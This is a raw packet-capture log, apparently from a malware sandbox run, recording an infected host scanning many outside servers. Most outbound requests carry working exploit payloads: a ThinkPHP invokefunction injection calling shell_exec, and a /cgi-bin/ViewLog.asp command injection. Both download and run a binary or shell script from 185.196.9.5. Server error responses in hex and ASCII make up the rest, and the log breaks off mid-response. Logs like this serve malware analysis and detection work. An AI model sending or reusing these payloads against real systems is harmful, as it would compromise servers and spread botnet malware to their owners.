Feb 25, 2024 19:05:23.810089111 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:24.013869047 CET	903	IN	HTTP/1.1 400 Bad Request content-type: text/html cache-control: private, no-cache, max-age=0 pragma: no-cache content-length: 679 date: Sun, 25 Feb 2024 18:05:23 GMT server: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1153	192.168.2.15	38410	88.132.22.140	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:24.025703907 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:24.244765043 CET	196	IN	HTTP/1.1 404 Not Found Content-type: text/html Content-Length: 0 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
1154	192.168.2.15	59642	31.200.111.214	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:24.112051964 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1155	192.168.2.15	58122	94.121.207.233	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:24.112051964 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1156	192.168.2.15	60524	94.122.31.206	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:24.115927935 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1157	192.168.2.15	41382	31.148.31.75	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:24.182751894 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:24.413132906 CET	490	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sun, 25 Feb 2024 18:05:23 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1158	192.168.2.15	43518	31.220.27.156	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:25.082062960 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:25.255429029 CET	394	IN	HTTP/1.1 200 OK Date: Sun, 25 Feb 2024 18:05:25 GMT Content-Length: 245 Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 7b 22 50 69 70 65 73 22 3a 5b 7b 22 4e 61 6d 65 22 3a 22 76 69 73 69 74 73 22 2c 22 45 76 65 6e 74 73 22 3a 35 34 35 31 37 37 2c 22 45 78 65 63 75 74 6f 72 73 22 3a 35 7d 2c 7b 22 4e 61 6d 65 22 3a 22 61 6e 74 69 46 72 61 75 64 22 2c 22 45 76 65 6e 74 73 22 3a 30 2c 22 45 78 65 63 75 74 6f 72 73 22 3a 30 7d 2c 7b 22 4e 61 6d 65 22 3a 22 73 79 73 74 65 6d 5f 72 65 70 6f 72 74 73 22 2c 22 45 76 65 6e 74 73 22 3a 30 2c 22 45 78 65 63 75 74 6f 72 73 22 3a 30 7d 2c 7b 22 4e 61 6d 65 22 3a 22 75 73 65 72 5f 70 61 67 65 5f 76 69 73 69 74 73 22 2c 22 45 76 65 6e 74 73 22 3a 31 35 30 30 2c 22 45 78 65 63 75 74 6f 72 73 22 3a 30 7d 5d 2c 22 47 6f 72 6f 75 74 69 6e 65 73 22 3a 34 33 2c 22 55 70 74 69 6d 65 22 3a 31 34 38 39 36 37 31 7d Data Ascii: {"Pipes":[{"Name":"visits","Events":545177,"Executors":5},{"Name":"antiFraud","Events":0,"Executors":0},{"Name":"system_reports","Events":0,"Executors":0},{"Name":"user_page_visits","Events":1500,"Executors":0}],"Goroutines":43,"Uptime":1489671}

Session ID	Source IP	Source Port	Destination IP	Destination Port
1159	192.168.2.15	55208	85.240.72.183	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:25.109261990 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:25.312248945 CET	411	IN	HTTP/1.1 404 Not Found Date: Sun, 25 Feb 2024 18:05:24 GMT Server: Webs X-Frame-Options: SAMEORIGIN Cache-Control: no-cache Content-Length: 166 Content-Type: text/html Connection: keep-alive Keep-Alive: timeout=60, max=99 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1160	192.168.2.15	53596	94.121.122.251	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:25.133130074 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1161	192.168.2.15	39886	88.80.187.185	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:26.432156086 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:26.614804029 CET	355	IN	HTTP/1.1 400 Bad Request Server: nginx/1.10.3 (Ubuntu) Date: Sun, 25 Feb 2024 18:05:26 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1162	192.168.2.15	54782	88.209.193.29	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:26.449646950 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:26.647461891 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:05:26 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1163	192.168.2.15	40694	88.221.182.89	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:26.530497074 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:26.852828979 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:27.140244961 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:05:27 GMT Date: Sun, 25 Feb 2024 18:05:27 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 64 33 65 31 32 30 32 26 23 34 36 3b 31 37 30 38 38 38 34 33 32 37 26 23 34 36 3b 33 30 38 34 34 66 65 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.cd3e1202.1708884327.30844fe8</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1164	192.168.2.15	43010	95.85.37.42	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:26.615103960 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:26.791856050 CET	323	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 17:55:03 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1165	192.168.2.15	45284	95.216.164.22	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:26.647780895 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:26.844191074 CET	292	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:05:26 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1166	192.168.2.15	42312	95.129.137.167	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:26.763463020 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:27.723268032 CET	582	IN	HTTP/1.1 403 Forbidden Date: Sun, 25 Feb 2024 18:05:26 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 268 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 50 cb 6a c3 30 10 bc fb 2b b6 b9 b4 a5 58 eb b8 0f 1a 10 86 36 76 48 20 69 05 75 0f 39 ca 96 40 a2 8e 24 24 25 6d fe be b2 43 a1 97 85 99 9d 9d 61 96 5e d5 ef cb 76 cf 1a 58 b7 bb 2d b0 cf d7 ed 66 09 b3 1c 71 d3 b4 2b c4 ba ad 2f 9b 92 14 88 cd db ac ca a8 8a 87 a1 a2 4a 72 91 40 d4 71 90 d5 43 71 0f 2b eb 3b 2d 84 34 14 2f 64 46 71 12 d1 ce 8a f3 78 37 af fe 69 12 ca a8 ab f6 f6 08 c2 9a eb 08 8a 9f 24 38 e9 0f 3a 04 6d 0d 44 0b bc ef 65 08 80 da 08 f9 43 9c 72 d9 c8 2b 1d 20 48 7f 92 9e 50 74 a3 b1 4f 83 0b e1 93 b8 7a 71 bc 57 12 4b 52 92 05 dc d4 b2 d3 dc dc 02 5b 33 7c 4c d4 53 3e bf 1b a4 31 e7 05 7c eb a8 e0 e3 a8 6c d0 26 67 3c f6 09 4d ae c0 23 b8 a0 3d 0f a4 b3 51 7f 11 7f 04 66 7d 84 e7 82 e2 5f 4c 2a 37 d5 4a 45 c6 77 64 bf 7b 2c 18 40 49 01 00 00 Data Ascii: MPj0+X6vH iu9@$$%mCa^vX-fq+/Jr@qCq+;-4/dFqx7i$8:mDeCr+ HPtOzqWKR[3\|LS>1\|l&g<M#=Qf}_L*7JEwd{,@I

Session ID	Source IP	Source Port	Destination IP	Destination Port
1167	192.168.2.15	47648	95.46.168.137	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:27.015028954 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:27.266680002 CET	317	IN	HTTP/1.1 400 Bad Request Server: Web server Date: Sun, 25 Feb 2024 18:05:25 GMT Content-Type: text/html Content-Length: 155 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>Web 